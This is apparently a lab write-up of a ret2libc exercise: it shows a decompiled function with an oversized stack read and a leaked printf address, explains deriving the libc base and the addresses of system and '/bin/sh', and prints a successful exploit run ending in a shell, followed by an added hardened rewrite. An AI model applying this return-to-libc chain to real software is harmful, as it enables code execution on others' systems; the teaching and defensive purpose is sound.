RTL PRACTICE

j0n9hyun 2018.11.08 02:50

The Last RTL

RTL for freshmen

int __cdecl main(int argc, const char **argv, const char **envp)
{
  return vuln();
}

The main function is trivial: it only calls vuln(). Let's look at the vuln function.

ssize_t vuln()
{
  int buf; // [esp+Ah] [ebp-3Eh]
  int v2; // [esp+Eh] [ebp-3Ah]
  __int16 v3; // [esp+12h] [ebp-36h]
  int v4; // [esp+38h] [ebp-10h]
  void *v5; // [esp+3Ch] [ebp-Ch]

  buf = 0;
  v2 = 0;
  v4 = 0;
  memset(
    (void *)((unsigned int)&v3 & 0xFFFFFFFC),
    0,
    4 * (((unsigned int)((char *)&v2 - ((unsigned int)&v3 & 0xFFFFFFFC) + 46) & 0xFFFFFFFC) >> 2));
  v5 = dlsym((void *)0xFFFFFFFF, "printf");
  printf("Printf() address : %p\n", v5);
  return read(0, &buf, 0x64u);
}

It may look complicated, but it is unexpectedly simple.
You don't need to understand every line; the two things that matter are the printf call, which prints the address of printf itself, and the read(0, &buf, 0x64) into a stack buffer that is smaller than 0x64 bytes.

 ⚙ j0n9hyun@Pwner  ~/lab/pwnstudy  ./ret2libc       
Printf() address : 0xf7df6670

 ⚙ j0n9hyun@Pwner  ~/lab/pwnstudy  ./ret2libc
Printf() address : 0xf7dd1670

 ⚙ j0n9hyun@Pwner  ~/lab/pwnstudy  ./ret2libc
Printf() address : 0xf7e1b670

Every time you run the binary, the printed address changes because of ASLR.
So we solve this by using the function's offset inside libc: the leaked printf address minus printf's offset gives the libc base, and the addresses of system and the "/bin/sh" string follow by adding their own offsets. The output below is from a successful exploit run.
I didn't upload the exploit code separately because I'm going to use it as a lesson plan to teach freshmen later.

[+] Starting local process './ret2libc': pid 25104
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

 *** Exploit Process ***
[*] printf_addr = 0xf7e45670
[*] printf_offset = 0x49670
[*] system_offset = 0x3ada0
[*] binsh_offset = 0x15ba0b

[*] libc_base_addr(0xf7dfc000) = printf_addr(0xf7e45670) - printf_offset(0x49670)
[*] system_addr(0xf7e36da0) = libc_base_addr(0xf7dfc000) + system_offset(0x3ada0)
[*] binsh_addr(0xf7ca05f5) = libc_base_addr(0xf7dfc000) + binsh_offset(0x15ba0b)
[*] binsh_addr[onegadget ver] = 0xf7e36c5c

*** Return To Library ***
[+] 66 bytes padding...
[+] Adding System Address...
[+] Adding 4 bytes of argument...
[+] Adding binsh Address...

[*] Paused (press any to continue)
[$] Exploit Success!
[*] Switching to interactive mode
$ id
uid=1000(j0n9hyun) gid=1000(j0n9hyun) groups=1000(j0n9hyun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
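To close from the defender's side, here is a hardened rewrite of the vuln() function. This is an added example, not the challenge binary's source and not the author's exploit. It assumes a stack buffer of about 50 bytes (BUF_SIZE is a guess taken from the frame layout in the decompiled listing, where buf sits at ebp-3Eh; 0x64 bytes of input run past the saved frame, which is why the exploit log needs 66 bytes of padding). Two things change: the read is bounded by the real size of the buffer, so the return address cannot be overwritten, and no code address is printed, so there is nothing to subtract the libc offset from and ASLR keeps doing its job. The feed_and_read() helper is only a self-check that pushes constructed input through a pipe.

```c
/* Hardened counterpart of the decompiled vuln() above.
 * Added example: not the challenge binary's source and not the
 * author's code. BUF_SIZE is an assumption based on the frame layout. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_SIZE 50   /* assumed size of the original stack buffer */

/* Read at most cap-1 bytes from fd into buf and always NUL-terminate.
 * Never writes past cap, whatever the caller's input length is.
 * Returns the number of payload bytes stored, or -1 on error. */
ssize_t bounded_read(int fd, char *buf, size_t cap)
{
    if (buf == NULL || cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) {
        buf[0] = '\0';
        return -1;
    }
    buf[n] = '\0';
    return n;
}

/* The fixed vuln(): the read length comes from sizeof the buffer instead
 * of a hard-coded 0x64, and the address of printf is no longer printed,
 * so there is no leak that would let anyone compute the libc base. */
ssize_t vuln_hardened(int fd)
{
    char buf[BUF_SIZE];
    memset(buf, 0, sizeof buf);
    return bounded_read(fd, buf, sizeof buf);
}

/* Self-check: offer `len` bytes of constructed input through a pipe and
 * report how many the hardened reader accepted. It must stop at
 * BUF_SIZE-1 no matter how much is offered. */
ssize_t feed_and_read(size_t len)
{
    int fds[2];
    char payload[256];

    if (pipe(fds) != 0)
        return -1;
    if (len > sizeof payload)
        len = sizeof payload;
    memset(payload, 'A', len);          /* constructed input, like the 66-byte padding */
    if (write(fds[1], payload, len) != (ssize_t)len) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);
    ssize_t got = vuln_hardened(fds[0]);
    close(fds[0]);
    return got;
}

int main(void)
{
    printf("100 bytes offered, %zd accepted\n", feed_and_read(100));
    printf("10 bytes offered, %zd accepted\n", feed_and_read(10));
    return 0;
}
```

The bounded read alone stops the return-address overwrite; removing the printed address is what keeps ASLR meaningful, because the whole chain in the log above starts from that one leaked value.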